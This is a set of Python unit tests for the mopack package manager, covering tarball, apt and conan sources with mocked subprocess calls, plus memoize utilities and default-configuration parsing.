pkg = TarballPackage('foo', path=self.srcpath, build='bfg9000',
_options=opts, config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
pkg = TarballPackage('foo', url=self.srcurl, build='bfg9000',
_options=opts, config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
pkg = TarballPackage('foo', path=self.srcpath, _options=opts,
config_file=self.config_file)
with self.assertRaises(ConfigurationError):
data = pkg.dehydrate()
def test_upgrade(self):
opts = self.make_options()
data = {'source': 'tarball', '_version': 0, 'name': 'foo',
'path': {'base': 'cfgdir', 'path': 'foo.tar.gz'}, 'url': None,
'files': [], 'srcdir': '.',
'patch': None, 'build': {'type': 'none', '_version': 0},
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(TarballPackage, 'upgrade',
side_effect=TarballPackage.upgrade) as m:
pkg = Package.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, TarballPackage)
m.assert_called_once()
def test_builder_types(self):
pkg = TarballPackage('foo', path=self.srcpath, build='bfg9000',
_options=self.make_options(),
config_file=self.config_file)
self.assertEqual(pkg.builder_types, ['bfg9000'])
pkg = TarballPackage('foo', path=self.srcpath,
_options=self.make_options(),
config_file=self.config_file)
with self.assertRaises(ConfigurationError):
pkg.builder_types
```
#### File: unit/sources/test_apt.py
```python
import os
import subprocess
from unittest import mock
from . import SourceTest, through_json
from .. import mock_open_log
from mopack.iterutils import iterate
from mopack.sources import Package
from mopack.sources.apt import AptPackage
from mopack.sources.conan import ConanPackage
def mock_run(args, **kwargs):
if args[0] == 'dpkg-query':
return subprocess.CompletedProcess(args, 0, '1.2.3')
raise OSError()
class TestApt(SourceTest):
pkg_type = AptPackage
config_file = '/path/to/mopack.yml'
pkgdir = '/path/to/builddir/mopack'
pkgconfdir = os.path.join(pkgdir, 'pkgconfig')
def check_resolve_all(self, packages, remotes):
with mock_open_log() as mopen, \
mock.patch('subprocess.run') as mrun: # noqa
AptPackage.resolve_all(packages, self.pkgdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'apt.log'
), 'a')
for i in packages:
if i.repository:
mrun.assert_any_call(
['sudo', 'add-apt-repository', '-y', i.repository],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
mrun.assert_any_call(
['sudo', 'apt-get', 'update'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True, check=True
)
mrun.assert_any_call(
['sudo', 'apt-get', 'install', '-y'] + remotes,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
def check_usage(self, pkg, *, submodules=None, usage=None):
if usage is None:
pcname = ('{}[{}]'.format(pkg.name, ','.join(submodules))
if submodules else pkg.name)
libs = ([] if pkg.submodules and pkg.submodules['required']
else [pkg.name])
libs.extend('{}_{}'.format(pkg.name, i)
for i in iterate(submodules))
usage = {'name': pkg.name, 'type': 'system',
'path': [self.pkgconfdir], 'pcfiles': [pcname],
'generated': True, 'auto_link': False}
with mock.patch('subprocess.run', mock_run), \
mock.patch('mopack.usage.path_system.PathUsage._filter_path',
lambda *args: []), \
mock.patch('mopack.usage.path_system.file_outdated',
return_value=True), \
mock.patch('os.makedirs'), \
mock.patch('builtins.open'): # noqa
self.assertEqual(pkg.get_usage(submodules, self.pkgdir), usage)
def test_basic(self):
pkg = self.make_package('foo')
self.assertEqual(pkg.remote, ['libfoo-dev'])
self.assertEqual(pkg.repository, None)
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], ['libfoo-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
self.assertEqual(pkg.version(self.pkgdir), '1.2.3')
mrun.assert_has_calls([
mock.call(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
),
mock.call(
['dpkg-query', '-W', '-f${Version}', 'libfoo-dev'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
),
])
self.check_usage(pkg)
def test_remote(self):
pkg = self.make_package('foo', remote='foo-dev')
self.assertEqual(pkg.remote, ['foo-dev'])
self.assertEqual(pkg.repository, None)
self.check_resolve_all([pkg], ['foo-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
self.assertEqual(pkg.version(self.pkgdir), '1.2.3')
mrun.assert_has_calls([
mock.call(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
),
mock.call(
['dpkg-query', '-W', '-f${Version}', 'foo-dev'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
),
])
self.check_usage(pkg)
pkg = self.make_package('foo', remote=['foo-dev', 'bar-dev'])
self.assertEqual(pkg.remote, ['foo-dev', 'bar-dev'])
self.assertEqual(pkg.repository, None)
self.check_resolve_all([pkg], ['foo-dev', 'bar-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
pkg.version(self.pkgdir)
mrun.assert_has_calls([
mock.call(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
),
mock.call(
['dpkg-query', '-W', '-f${Version}', 'foo-dev'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
),
])
self.check_usage(pkg)
def test_repository(self):
pkg = self.make_package('foo', remote='foo-dev',
repository='ppa:foo/stable')
self.assertEqual(pkg.remote, ['foo-dev'])
self.assertEqual(pkg.repository, 'ppa:foo/stable')
self.check_resolve_all([pkg], ['foo-dev'])
self.check_usage(pkg)
def test_explicit_version(self):
pkg = self.make_package('foo', usage={
'type': 'system', 'version': '2.0',
})
self.assertEqual(pkg.remote, ['libfoo-dev'])
self.assertEqual(pkg.repository, None)
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], ['libfoo-dev'])
with mock.patch('subprocess.run', side_effect=mock_run) as mrun:
self.assertEqual(pkg.version(self.pkgdir), '2.0')
mrun.assert_called_once_with(
['pkg-config', 'foo', '--modversion'], check=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
universal_newlines=True
)
self.check_usage(pkg)
def test_multiple(self):
pkgs = [self.make_package('foo'),
self.make_package('bar', remote='bar-dev')]
self.check_resolve_all(pkgs, ['libfoo-dev', 'bar-dev'])
for pkg in pkgs:
self.check_usage(pkg)
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
pkg = self.make_package('foo', submodules=submodules_required)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package(
'foo', usage={'type': 'system', 'libraries': 'bar'},
submodules=submodules_required
)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'system', 'path': [self.pkgconfdir],
'pcfiles': ['foo[sub]'], 'generated': True, 'auto_link': False,
})
pkg = self.make_package('foo', submodules=submodules_optional)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package(
'foo', usage={'type': 'system', 'libraries': 'bar'},
submodules=submodules_optional
)
self.check_resolve_all([pkg], ['libfoo-dev'])
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'system', 'path': [self.pkgconfdir],
'pcfiles': ['foo[sub]'], 'generated': True, 'auto_link': False,
})
def test_invalid_submodule(self):
pkg = self.make_package('foo', submodules={
'names': ['sub'], 'required': True
})
with self.assertRaises(ValueError):
pkg.get_usage(['invalid'], self.pkgdir)
def test_deploy(self):
pkg = self.make_package('foo')
# This is a no-op; just make sure it executes ok.
AptPackage.deploy_all([pkg], self.pkgdir)
def test_clean_pre(self):
oldpkg = self.make_package('foo')
newpkg = self.make_package(ConanPackage, 'foo',
remote='foo/1.2.4@conan/stable')
# Apt -> Conan
self.assertEqual(oldpkg.clean_pre(newpkg, self.pkgdir), False)
# Apt -> nothing
self.assertEqual(oldpkg.clean_pre(None, self.pkgdir), False)
def test_clean_post(self):
oldpkg = self.make_package('foo')
newpkg = self.make_package(ConanPackage, 'foo',
remote='foo/1.2.4@conan/stable')
# Apt -> Conan
self.assertEqual(oldpkg.clean_post(newpkg, self.pkgdir), False)
# Apt -> nothing
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), False)
def test_clean_all(self):
oldpkg = self.make_package('foo')
newpkg = self.make_package(ConanPackage, 'foo',
remote='foo/1.2.4@conan/stable')
# Apt -> Conan
self.assertEqual(oldpkg.clean_all(newpkg, self.pkgdir), (False, False))
# Apt -> nothing
self.assertEqual(oldpkg.clean_all(None, self.pkgdir), (False, False))
def test_equality(self):
pkg = self.make_package('foo')
self.assertEqual(pkg, self.make_package('foo'))
self.assertEqual(pkg, self.make_package('foo', remote='libfoo-dev'))
self.assertEqual(pkg, self.make_package(
'foo', config_file='/path/to/mopack2.yml'
))
self.assertNotEqual(pkg, self.make_package('bar'))
self.assertNotEqual(pkg, self.make_package('bar', remote='libfoo-dev'))
self.assertNotEqual(pkg, self.make_package('foo', remote='libbar-dev'))
def test_rehydrate(self):
opts = self.make_options()
pkg = AptPackage('foo', remote='libbar-dev', _options=opts,
config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'source': 'apt', '_version': 0, 'name': 'foo',
'remote': 'libfoo-dev', 'repository': None,
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(AptPackage, 'upgrade',
side_effect=AptPackage.upgrade) as m:
pkg = Package.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, AptPackage)
m.assert_called_once()
```
#### File: unit/sources/test_conan.py
```python
import os
import subprocess
from io import StringIO
from textwrap import dedent
from unittest import mock
from . import OptionsTest, SourceTest, through_json
from .. import mock_open_log
from mopack.iterutils import iterate
from mopack.shell import ShellArguments
from mopack.sources import Package, PackageOptions
from mopack.sources.apt import AptPackage
from mopack.sources.conan import ConanPackage
def mock_open_write():
class MockFile(StringIO):
def close(self):
pass
mock_open = mock.mock_open()
def non_mock(*args, **kwargs):
mock_open.side_effect = None
mock_open.mock_file = MockFile()
return mock_open.mock_file
mock_open.side_effect = non_mock
return mock_open
class TestConan(SourceTest):
pkg_type = ConanPackage
config_file = os.path.abspath('/path/to/mopack.yml')
pkgdir = os.path.abspath('/path/to/builddir/mopack')
pkgconfdir = os.path.join(pkgdir, 'conan')
def check_resolve_all(self, pkgs, conanfile, extra_args=[]):
with mock_open_log(mock_open_write()) as mopen, \
mock.patch('subprocess.run') as mrun: # noqa
ConanPackage.resolve_all(pkgs, self.pkgdir)
self.assertEqual(mopen.mock_file.getvalue(), conanfile)
conandir = os.path.join(self.pkgdir, 'conan')
mrun.assert_called_with(
(['conan', 'install', '-if', conandir] + extra_args +
['--', self.pkgdir]),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
def check_usage(self, pkg, *, submodules=None, usage=None):
if usage is None:
pcfiles = ([] if pkg.submodules and pkg.submodules['required'] else
[pkg.name])
pcfiles.extend('{}_{}'.format(pkg.name, i)
for i in iterate(submodules))
usage = {'name': pkg.name, 'type': 'pkg_config',
'path': [self.pkgconfdir], 'pcfiles': pcfiles,
'extra_args': []}
self.assertEqual(pkg.get_usage(submodules, self.pkgdir), usage)
def test_basic(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""))
with mock.patch('subprocess.run') as mrun:
pkg.version(self.pkgdir)
mrun.assert_called_once_with(
['conan', 'inspect', '--raw=version',
'foo/1.2.3@conan/stable'],
check=True, stdout=subprocess.PIPE, universal_newlines=True
)
self.check_usage(pkg)
def test_build(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
build=True)
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, True)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.needs_dependencies, False)
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build=foo'])
self.check_usage(pkg)
def test_options(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
options={'shared': True})
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {'shared': True})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
foo:shared=True
[generators]
pkg_config
"""))
self.check_usage(pkg)
def test_this_options(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
this_options={'build': 'foo',
'extra_args': '-gcmake'})
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build=foo', '-gcmake'])
self.check_usage(pkg)
def test_this_options_build_all(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
this_options={'build': 'all'})
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, False)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build'])
self.check_usage(pkg)
def test_this_options_merge_build(self):
pkg = self.make_package(
'foo', remote='foo/1.2.3@conan/stable', build=True,
this_options={'build': ['foo', 'bar']}
)
self.assertEqual(pkg.remote, 'foo/1.2.3@conan/stable')
self.assertEqual(pkg.build, True)
self.assertEqual(pkg.options, {})
self.assertEqual(pkg.should_deploy, True)
self.check_resolve_all([pkg], dedent("""\
[requires]
foo/1.2.3@conan/stable
[options]
[generators]
pkg_config
"""), ['--build=foo', '--build=bar'])
self.check_usage(pkg)
def test_multiple(self):
pkgs = [
self.make_package('foo', remote='foo/1.2.3@conan/stable'),
self.make_package('bar', remote='bar/2.3.4@conan/stable',
options={'shared': True}),
]
self.check_resolve_all(pkgs, dedent("""\
[requires]
foo/1.2.3@conan/stable
bar/2.3.4@conan/stable
[options]
bar:shared=True
[generators]
pkg_config
"""))
for pkg in pkgs:
self.check_usage(pkg)
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
submodules=submodules_required)
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
usage={'type': 'pkg_config', 'path': '.',
'pcfile': 'bar'},
submodules=submodules_required)
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config', 'path': [self.pkgconfdir],
'pcfiles': ['bar', 'foo_sub'], 'extra_args': [],
})
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
submodules=submodules_optional)
self.check_usage(pkg, submodules=['sub'])
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
usage={'type': 'pkg_config', 'path': '.',
'pcfile': 'bar'},
submodules=submodules_optional)
self.check_usage(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config', 'path': [self.pkgconfdir],
'pcfiles': ['bar', 'foo_sub'], 'extra_args': [],
})
def test_invalid_submodule(self):
pkg = self.make_package(
'foo', remote='foo/1.2.3@conan/stable',
submodules={'names': ['sub'], 'required': True}
)
with self.assertRaises(ValueError):
pkg.get_usage(['invalid'], self.pkgdir)
def test_deploy(self):
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
self.assertEqual(pkg.should_deploy, True)
with mock.patch('warnings.warn') as mwarn:
ConanPackage.deploy_all([pkg], self.pkgdir)
mwarn.assert_called_once()
pkg = self.make_package('foo', remote='foo/1.2.3@conan/stable',
deploy=False)
self.assertEqual(pkg.should_deploy, False)
with mock.patch('warnings.warn') as mwarn:
ConanPackage.deploy_all([pkg], self.pkgdir)
mwarn.assert_not_called()
def test_clean_pre(self):
oldpkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
newpkg = self.make_package(AptPackage, 'foo')
# Conan -> Apt
self.assertEqual(oldpkg.clean_pre(newpkg, self.pkgdir), False)
# Conan -> Nothing
self.assertEqual(oldpkg.clean_pre(None, self.pkgdir), False)
def test_clean_post(self):
oldpkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
newpkg1 = self.make_package('foo', remote='foo/1.2.4@conan/stable')
newpkg2 = self.make_package(AptPackage, 'foo')
# Conan -> Conan
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(newpkg1, self.pkgdir), False)
mlog.assert_not_called()
mremove.assert_not_called()
# Conan -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(newpkg2, self.pkgdir), True)
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Conan -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), True)
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Conan -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir, True), True)
mlog.assert_not_called()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Error deleting
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove',
side_effect=FileNotFoundError) as mremove: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), True)
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
def test_clean_all(self):
oldpkg = self.make_package('foo', remote='foo/1.2.3@conan/stable')
newpkg1 = self.make_package('foo', remote='foo/1.2.4@conan/stable')
newpkg2 = self.make_package(AptPackage, 'foo')
# Conan -> Conan
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_all(newpkg1, self.pkgdir),
(False, False))
mlog.assert_not_called()
mremove.assert_not_called()
# Conan -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_all(newpkg2, self.pkgdir),
(False, True))
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Conan -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove') as mremove: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir),
(False, True))
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
# Error deleting
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('os.remove',
side_effect=FileNotFoundError) as mremove: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir),
(False, True))
mlog.assert_called_once()
mremove.assert_called_once_with(os.path.join(
self.pkgdir, 'conan', 'foo.pc'
))
def test_equality(self):
remote = 'foo/1.2.3@conan/stable'
options = {'shared': True}
pkg = self.make_package('foo', remote=remote, options=options)
self.assertEqual(pkg, self.make_package(
'foo', remote=remote, options=options
))
self.assertEqual(pkg, self.make_package(
'foo', remote=remote, options=options,
config_file='/path/to/mopack2.yml'
))
self.assertNotEqual(pkg, self.make_package(
'bar', remote=remote, options=options
))
self.assertNotEqual(pkg, self.make_package(
'foo', remote='foo/1.2.4@conan/stable', options=options
))
self.assertNotEqual(pkg, self.make_package('foo', remote=remote))
def test_rehydrate(self):
opts = self.make_options()
pkg = ConanPackage('foo', remote='foo/1.2.3@conan/stable',
options={'shared': True}, _options=opts,
config_file=self.config_file)
data = through_json(pkg.dehydrate())
self.assertEqual(pkg, Package.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'source': 'conan', '_version': 0, 'name': 'foo',
'remote': 'foo', 'build': False, 'options': None,
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(ConanPackage, 'upgrade',
side_effect=ConanPackage.upgrade) as m:
pkg = Package.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, ConanPackage)
m.assert_called_once()
class TestConanOptions(OptionsTest):
symbols = {'variable': 'value'}
def test_default(self):
opts = ConanPackage.Options()
self.assertEqual(opts.build, [])
self.assertEqual(opts.extra_args, ShellArguments())
def test_build(self):
opts = ConanPackage.Options()
opts(build='foo', config_file=self.config_file, _symbols=self.symbols)
self.assertEqual(opts.build, ['foo'])
opts(build=['bar', 'foo', 'baz'], config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.build, ['foo', 'bar', 'baz'])
opts(build='$variable', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.build, ['foo', 'bar', 'baz', 'value'])
def test_extra_args(self):
opts = ConanPackage.Options()
opts(extra_args='--foo', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments(['--foo']))
opts(extra_args='--bar --baz', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments([
'--foo', '--bar', '--baz'
]))
opts(extra_args=['--goat', '--panda'], config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments([
'--foo', '--bar', '--baz', '--goat', '--panda'
]))
opts(extra_args='$variable', config_file=self.config_file,
_symbols=self.symbols)
self.assertEqual(opts.extra_args, ShellArguments([
'--foo', '--bar', '--baz', '--goat', '--panda', 'value'
]))
def test_rehydrate(self):
opts = ConanPackage.Options()
opts(build='foo', extra_args='--arg', config_file=self.config_file,
_symbols=self.symbols)
data = through_json(opts.dehydrate())
self.assertEqual(opts, PackageOptions.rehydrate(data))
def test_upgrade(self):
data = {'source': 'conan', '_version': 0, 'build': [],
'extra_args': []}
with mock.patch.object(ConanPackage.Options, 'upgrade',
side_effect=ConanPackage.Options.upgrade) as m:
pkg = PackageOptions.rehydrate(data)
self.assertIsInstance(pkg, ConanPackage.Options)
m.assert_called_once()
```
#### File: test/unit/test_objutils.py
```python
from unittest import TestCase
from mopack.objutils import *
class TestMemoize(TestCase):
def test_memoize_0_args(self):
i = 0
@memoize
def f():
nonlocal i
i += 1
return i
self.assertEqual(f(), 1)
self.assertEqual(f(), 1)
def test_memoize_1_arg(self):
i = 0
@memoize
def f(j):
nonlocal i
i += 1
return i + j
self.assertEqual(f(0), 1)
self.assertEqual(f(1), 3)
self.assertEqual(f(0), 1)
def test_memoize_reset(self):
i = 0
@memoize
def f(j):
nonlocal i
i += 1
return i + j
self.assertEqual(f(0), 1)
self.assertEqual(f(1), 3)
f._reset()
self.assertEqual(f(0), 3)
self.assertEqual(f(1), 5)
class TestMemoizeMethod(TestCase):
def test_memoize_0_args(self):
class Foo:
def __init__(self, i):
self.i = i
@memoize_method
def fn(self):
self.i += 1
return self.i
f = Foo(0)
self.assertEqual(f.fn(), 1)
self.assertEqual(f.fn(), 1)
g = Foo(1)
self.assertEqual(g.fn(), 2)
self.assertEqual(g.fn(), 2)
del g
h = Foo(2)
self.assertEqual(h.fn(), 3)
self.assertEqual(h.fn(), 3)
def test_memoize_1_arg(self):
class Foo:
def __init__(self, i):
self.i = i
@memoize_method
def fn(self, j):
self.i += 1
return self.i + j
f = Foo(0)
self.assertEqual(f.fn(0), 1)
self.assertEqual(f.fn(1), 3)
self.assertEqual(f.fn(0), 1)
g = Foo(1)
self.assertEqual(g.fn(0), 2)
self.assertEqual(g.fn(1), 4)
self.assertEqual(g.fn(0), 2)
del g
h = Foo(2)
self.assertEqual(h.fn(0), 3)
self.assertEqual(h.fn(1), 5)
self.assertEqual(h.fn(0), 3)
def test_memoize_reset(self):
class Foo:
def __init__(self, i):
self.i = i
@memoize_method
def fn(self, j):
self.i += 1
return self.i + j
f = Foo(0)
Foo.fn._reset(f)
self.assertEqual(f.fn(0), 1)
self.assertEqual(f.fn(1), 3)
self.assertEqual(f.fn(0), 1)
g = Foo(1)
self.assertEqual(g.fn(0), 2)
self.assertEqual(g.fn(1), 4)
self.assertEqual(g.fn(0), 2)
Foo.fn._reset(f)
self.assertEqual(f.fn(0), 3)
self.assertEqual(f.fn(1), 5)
self.assertEqual(f.fn(0), 3)
self.assertEqual(g.fn(0), 2)
self.assertEqual(g.fn(1), 4)
self.assertEqual(g.fn(0), 2)
```
#### File: test/unit/test_package_defaults.py
```python
from unittest import mock, TestCase
from mopack.package_defaults import DefaultConfig, _get_default_config
from mopack.yaml_tools import YamlParseError
def mock_open(read_data):
return mock.mock_open(read_data=read_data)
class TestDefaultConfig(TestCase):
def test_string_field(self):
data = 'source:\n foo:\n field: value'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'value')
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', 'default'),
'default')
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', 'default'),
'default')
self.assertEqual(cfg.get({}, 'usage', 'foo', 'field'), None)
self.assertEqual(cfg.get({}, 'usage', 'foo', 'field', 'default'),
'default')
def test_list_field(self):
data = 'source:\n foo:\n field: [1, 2]'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), [1, 2])
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', []), [])
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', []), [])
def test_dict_field(self):
data = 'source:\n foo:\n field: {goat: 1, panda: 2}'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'),
{'goat': 1, 'panda': 2})
self.assertEqual(cfg.get({}, 'source', 'foo', 'other'), None)
self.assertEqual(cfg.get({}, 'source', 'foo', 'other', {}), {})
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field', {}), {})
def test_expr_field(self):
data = 'source:\n foo:\n field: $variable'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
symbols = {'variable': 'goat'}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
symbols = {'variable': 'panda'}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
def test_conditional(self):
data = 'source:\n foo:\n - if: true\n field: goat'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
data = 'source:\n foo:\n - if: false\n field: goat'
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
self.assertEqual(cfg.get({}, 'source', 'foo', 'field'), None)
self.assertEqual(cfg.get({}, 'source', 'bar', 'field'), None)
def test_conditional_expr(self):
data = ('source:\n foo:\n - if: variable == true\n' +
' field: goat\n - field: panda')
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
symbols = {'variable': True}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'goat')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
symbols = {'variable': False}
self.assertEqual(cfg.get(symbols, 'source', 'foo', 'field'), 'panda')
self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
def test_invalid_conditional(self):
data = ('source:\n foo:\n - field: goat\n - field: panda')
with mock.patch('builtins.open', mock_open(data)), \
self.assertRaises(YamlParseError): # noqa
DefaultConfig('file.yml')
def test_invalid_genus(self):
data = ('goofy:\n foo:\n field: value')
with mock.patch('builtins.open', mock_open(data)), \
self.assertRaises(YamlParseError): # noqa
DefaultConfig('file.yml')
data = ('source:\n foo:\n field: value')
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
with self.assertRaises(ValueError):
cfg.get({}, 'goofy', 'foo', 'field')
class TestGetDefaultConfig(TestCase):
def setUp(self):
_get_default_config._reset()
def tearDown(self):
_get_default_config._reset()
def test_normal(self):
with mock.patch('os.path.exists', return_value=False) as mexists:
_get_default_config('foo')
mexists.assert_called_once()
def test_invalid_characters(self):
with mock.patch('os.path.exists', return_value=False) as mexists:
_get_default_config('foo/bar')
_get_default_config('.')
_get_default_config('../foo')
mexists.assert_not_called()
```
